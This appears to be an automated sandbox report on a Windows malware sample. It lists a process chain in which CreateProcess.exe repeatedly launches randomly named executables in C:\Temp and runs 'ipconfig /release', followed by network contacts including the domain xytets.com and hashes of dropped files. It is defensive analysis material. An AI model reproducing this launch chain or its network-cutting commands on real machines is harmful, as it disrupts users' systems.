C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_ecwupmhfzx.exe ups_ins

C:\Temp\i_ecwupmhfzx.exe

C:\Temp\i_ecwupmhfzx.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\bztrljebwu.exe ups_run

C:\Temp\bztrljebwu.exe

C:\Temp\bztrljebwu.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_bztrljebwu.exe ups_ins

C:\Temp\i_bztrljebwu.exe

C:\Temp\i_bztrljebwu.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\ywqojgbztr.exe ups_run

C:\Temp\ywqojgbztr.exe

C:\Temp\ywqojgbztr.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_ywqojgbztr.exe ups_ins

C:\Temp\i_ywqojgbztr.exe

C:\Temp\i_ywqojgbztr.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\eywqoigbyt.exe ups_run

C:\Temp\eywqoigbyt.exe

C:\Temp\eywqoigbyt.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_eywqoigbyt.exe ups_ins

C:\Temp\i_eywqoigbyt.exe

C:\Temp\i_eywqoigbyt.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\yvqoigaytq.exe ups_run

C:\Temp\yvqoigaytq.exe

C:\Temp\yvqoigaytq.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_yvqoigaytq.exe ups_ins

C:\Temp\i_yvqoigaytq.exe

C:\Temp\i_yvqoigaytq.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\sqlidavtnl.exe ups_run

C:\Temp\sqlidavtnl.exe

C:\Temp\sqlidavtnl.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_sqlidavtnl.exe ups_ins

C:\Temp\i_sqlidavtnl.exe

C:\Temp\i_sqlidavtnl.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\pnhfaxsqki.exe ups_run

C:\Temp\pnhfaxsqki.exe

C:\Temp\pnhfaxsqki.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_pnhfaxsqki.exe ups_ins

C:\Temp\i_pnhfaxsqki.exe

C:\Temp\i_pnhfaxsqki.exe ups_ins

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 xytets.com udp
US 8.8.8.8:53 xytets.com udp
GB 2.16.153.224:443 www.bing.com tcp
GB 2.16.153.224:443 www.bing.com tcp
US 150.171.27.10:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.179.227:80 c.pki.goog tcp

Files

C:\Temp\gaysqlidbvtnlfdy.exe

MD5 8bd59ffe6e3f2901ef8d3407ed3bd7b8
SHA1 83616d24963b4ef41499c2c263104e7f0fa07d80
SHA256 606fac37db0f300b4eb0974fd1857c5f31d5c9a8dc2d91e24a978e4b7bd57910
SHA512 608500663cb6ff423e8b381d698aba1ae219580c824a03b1ef7fa881d1484b916ccb19e08c2a4422ffb670939770ea16a06a8ea795c9fa04765af30867b25807

C:\Temp\CreateProcess.exe

MD5 b87f6ca9b766721033ec7cf62f08c032
SHA1 83c86e882544929e612d632af4a6b85effbe29e6
SHA256 cbbf09449982457e2560f1109303ae31baeaa7bb31da02aed46da067d20ae5bb
SHA512 b02ce64b6b399bb428628b92c114569942b3ede5c9bc3ecd55c9f0e0671b55cb625835a198ce69a8aebb5526c316aa7d651a9b4e566a7cab72477a25495b399c

C:\Temp\qljdbvtnlg.exe

MD5 ae61ca76753d97fe441ed4c9b3cb685d
SHA1 0aaefc297f03cafc0e4836f8ecf9784d7911a0bc
SHA256 be4810ea47d50926a3b70846537bc6f2b6b387fb36077e88a3d8b5ea2c5327ab
SHA512 89125e1a74622e228bc8c3563146f290bb265d8d541992c783b8e74cdad4581b0134163973d0a8575279c5d1d48d5708d21bf1cc349a36282dff43b9010628ed

C:\Temp\i_qljdbvtnlg.exe

MD5 7a57b247a09b6da3d0d04dd0bc4756f7
SHA1 cc58a9eda9481162c3f846027f70a48028b12a57
SHA256 3c39c2351e5ddf0f395a21cdc847610ec94b97db6c4491be38b2ccbb68c67fde
SHA512 a386e9b10f3cbfebd43f8e34bcc075bbfe324ec45823c2b28d343ca2d0e1504b157077c7fd8409de7e9ded0cc1070fe200d4f41d952e72c81600281841bf3db3

C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

MD5 da597791be3b6e732f0bc8b20e38ee62
SHA1 1125c45d285c360542027d7554a5c442288974de
SHA256 5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07
SHA512 d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

C:\Users\Admin\AppData\Local\Temp\KnoB546.tmp

MD5 002d5646771d31d1e7c57990cc020150
SHA1 a28ec731f9106c252f313cca349a68ef94ee3de9
SHA256 1e2e25bf730ff20c89d57aa38f7f34be7690820e8279b20127d0014dd27b743f
SHA512 689e90e7d83eef054a168b98ba2b8d05ab6ff8564e199d4089215ad3fe33440908e687aa9ad7d94468f9f57a4cc19842d53a9cd2f17758bdadf0503df63629c6

C:\Temp\qkicavsnlf.exe

MD5 8d7095afbf00d372b0f29d96599147a4
SHA1 efb845ab82f3eb38f042f917de10e3d20fe6216b
SHA256 4bd1b92721a04c71527b116f89696944b578b0ec2268c12133c79454bd8dcc21
SHA512 d817c74f4aa5869ebefdb989295f40678b68ad4e168e6c5d1b02667a4b8c82fd6f6e5df87b730f1e587d7d50d4d7c4de8d7609c78958465b0b3257f883351cb2

C:\Temp\i_qkicavsnlf.exe

MD5 b2add65ce3a6428a71cc7f3972e86204
SHA1 5a311a5c0ab2589eb8bb398f60f67ec9f51d5657
SHA256 9302ac6916b64c25f925154d4e193535c4280eff1601b51e04e4c9f84025241f
SHA512 a548f6016c73128bac86b9921e0310b681512c8389544209afd300e4d1a46973a2dae0133893a1fd4dcc229d051bb233f96f6e58df8576242e64f04c0881fc2f

C:\Temp\kfdxvpnifa.exe

MD5 f22936b9ceede0debf9251248f21ae22
SHA1 c29f80848030f2e7045fc957fde97fbc0060032f
SHA256 425a716f9fcde9e727c8347b09d70013f434ae4ec2f360cdaecff9eb93076c6c
SHA512 6331fd6f3aa449e8956332f63ff0206265b410b0b25c3f96aa98022376dcba78ab3008fe8bda9eac2ad21ca93c46c0cad9f56617236f7bcc8b7e56acb1bffb9d

C:\Temp\i_kfdxvpnifa.exe

MD5 32b1c9c3e7f0b2b77b813e041cf724e0
SHA1 51d3a17a95a3df9b6011c2500700134ba604ba77
SHA256 aa68498ae1b0d4c9499ee42a7e206914f503211c4506e734029c9beafaf5e71f
SHA512 4ac311e80b33bfec645d093619802721827f17503b10cb43f76d57188a5ce2666199256368109239638cd907ad6a4c8a55e501c07a602c94f84e69a00721a16c

C:\Temp\causmkecxu.exe

MD5 48ebfff146dba68b9195a635f0cd0d70
SHA1 9167f1a4a2e2c0c429bfcc20aabcb80fdf555b7d
SHA256 8b67f79c02190d21bb0834eedead4b375b688d7cd2bf8f17892607532dd0cacd
SHA512 358b2083d1c429ac5026efffbd2706a77073887d112cf7889f48411dd4722c0240d02ca3d12d0d5370c7d7f38d595cf09cb7989aee4da0a83ddf2c751904d073

C:\Temp\i_causmkecxu.exe

MD5 fdf962bb8b76a88ddcb01d26946a8071
SHA1 e701602a1c50a74765c46813d3d0dd764f54e0c5
SHA256 1c8426899e25573ca4b1278c63cc06bdd710cc1f3cfbdba10ffb2afbd548f458
SHA512 851bede32c8e47913d8c76d1feab8c7b9c90448e3844b7b3f87fe7114760ab72eff2fcbadba6b43cae4070841bef6422b101c21bea9dbbd412675db0adc0c583

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0

MD5 6fa63488caea8b3594fea115df3be326
SHA1 c3e7561107396a1178e0d032e55da05ecc81ecd4
SHA256 3b67d81ecd4a7d8e6cf9c0aac3216b42673664287e2b126f46f33c11404ff975
SHA512 f1d1f0c27ec78458c1cfe994bd51fd2da4dc4a69196dba788cd7987041a7c6c3b8a51f94d84cfb498700c543f54eeae74ccef3c9c839d3a1b648e00e54e0cb62

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_9F6005AF34C7906F717D420F892FD6D0

MD5 d88b404d9ef9dbb7f487efc2c9059932
SHA1 7f77868f9bdb0b36b97d7789b74e55b08629ed67
SHA256 28451710b1a40ad631eccff213a73987a6e37fb055d865bcc1519b7ca573f02f
SHA512 f62cf481c71d58ab8dccd47ca932156cd8fc2ecdfcd9d2becc823d724945a93ced788c6ba9eb33bf315b23e8962ffa39811c3c93c86b219d020e89f7eac8f2d4

C:\Temp\fzxrpkhczu.exe

MD5 c21f3d6919e8eb2f305553682aa13630
SHA1 ff48fdb93d90396a37bcf62cfe580860bb1a4744
SHA256 07f5358fe3f0d8814948d2cd2036e0a651a2074e960855d33a01cf91fb1bd1fb
SHA512 9e38f046baaad712762cc8bd907a9c6aa05dab1bb11c15327c1e3f57565b991e6db1d62e339f2f3b17981151571c7a38c2584ecdc353eb076e33efb856fda0de

C:\Temp\i_fzxrpkhczu.exe

MD5 41df8293ab5c97ab2c4b3e9530d76f27
SHA1 3e065912e7a227404936199cec1c7d172459d436
SHA256 d2ed66dbadf4f8ba261a83b42b331161e70b378b5e35a6b64c812058f754f0d8
SHA512 9d36c13b178c1b3d3c2bf4c0302b799923979dff65a242ccc70f18452349caf3393d44ed459dd68eeaa9ceec7d88679ea3348d4642dca86d74dfe3d4fe16c6e9

C:\Temp\wrpjhbzurm.exe

MD5 08a707e2b83625cbfb6327d9ad33c9b0
SHA1 cbf3eed0fdec4a88c8677bfc142dd3d37168a19a
SHA256 b02637212f9560bde400a38a3adaa48a152c01cfe5e5c3ccfbe6515114d229b4
SHA512 cafadd9fbe3d4c4fc6d10af256db7a95104ac72eb3a16de1a1a44de667d486117291a302f864d78bd82b09dde094482504b454e1e28fdedc7a9c8e627d00891c

C:\Temp\i_wrpjhbzurm.exe

MD5 aca8c9eb8e675338906dc49bf4f57f5d
SHA1 ef637778e8ed4686f6281d4f59e701a024a1d164
SHA256 e23787338cbe6526e4ac5cdae2fb29810bd0f316d8063dfdbcc587cf9897d75b
SHA512 61654e6c18cff7a505a83ca84d8eaea7146e81feae149379c7eb324d4dcb1de7de05784429138ceebf9b719cb456c48f9083fd27c95a5826e8c073fd68c08312

C:\Temp\rmjecwuomg.exe

MD5 ccad2b40959b45358526e7a6b0dd3582
SHA1 ef6e0c6740e65ab23b1d05353da374500f43d595
SHA256 cbcaeab8688111767ac5754e7ad13258d2e34bbbe46f3d654aa45bcaa7275e0d
SHA512 b58f57173bfca9e3de7a4f6431eb6505d79e37c8f7d4f10e6baafdd0ca521d18bdf9c5736b68ca5f0326ee01d71591d78f1a881ba793f843230211b699381189

C:\Temp\i_rmjecwuomg.exe

MD5 36ed5c47843368dcc32845f3f11f6e06
SHA1 4498e5419bc9521fd1ddc06900926612352c901f
SHA256 36b5dbcf7f3ba7663124749e61af020dc9721b4353a252b8b0c6c1c886cee444
SHA512 ade4a67e2c23abf7f291584f8f585ce7f371279a9a22ba3790541ff1b42000f0053d6628fac563c2ef53ae7e5dfd0294d9d6817741a65a69853679dbd6e53b08

C:\Temp\igbytrljdb.exe

MD5 23c0e2f0afc791c44c15b3e2e268e804
SHA1 61dc1ae39cd89392e34800ae3a980b6ca0ab6bdd
SHA256 fd57dc2761344a2ebce5e6833847e7cd6ef909c273308b898f92897baeef8aca
SHA512 1184b9d59b74bbec7444092ada5c2521b9bad7523ddb901c0bf36017babed9600402374d26965d5e90fc0c4ebc9d212a4ca6e5f5cf2af6d60dd761a9edd35f4d

C:\Temp\i_igbytrljdb.exe

MD5 8c524ffefc22d4d21d595571491f376a
SHA1 ee9c9233eb6da79bdee82fea68912b9a5e4ef81d
SHA256 7e2cac8272a6263d98d9bc86fbbaad088bd41f1651b554dab0e6621f14c7b4ae
SHA512 5207727daa491908ac2bfdcc2a2d768591a9f1127738bfc0b30448c33fd2dac495e547808c6983a817d0bff6a797240c563821acf5ed9d652ddcabaa3fddd196

C:\Temp\oigaytqljd.exe

MD5 e96e19ff7e5a82a1391d9fbbb64c7c9a
SHA1 4d263fd98ce3c4d944ec3cbf0e8dba900eaf06e1
SHA256 a23099f25829111f03b46f0642f846a809c5f911ff0237c1461793d0be34ebaf
SHA512 07b0b5ec6576816d341b371e9a718e4cf0cb95ccc93b067bbb77c4da8053dd117797c9eb2fecd692db6eb9711876bcb7b1c5f2f3a07d15f4fcf079da13b00318

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\3DU1MKF3\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee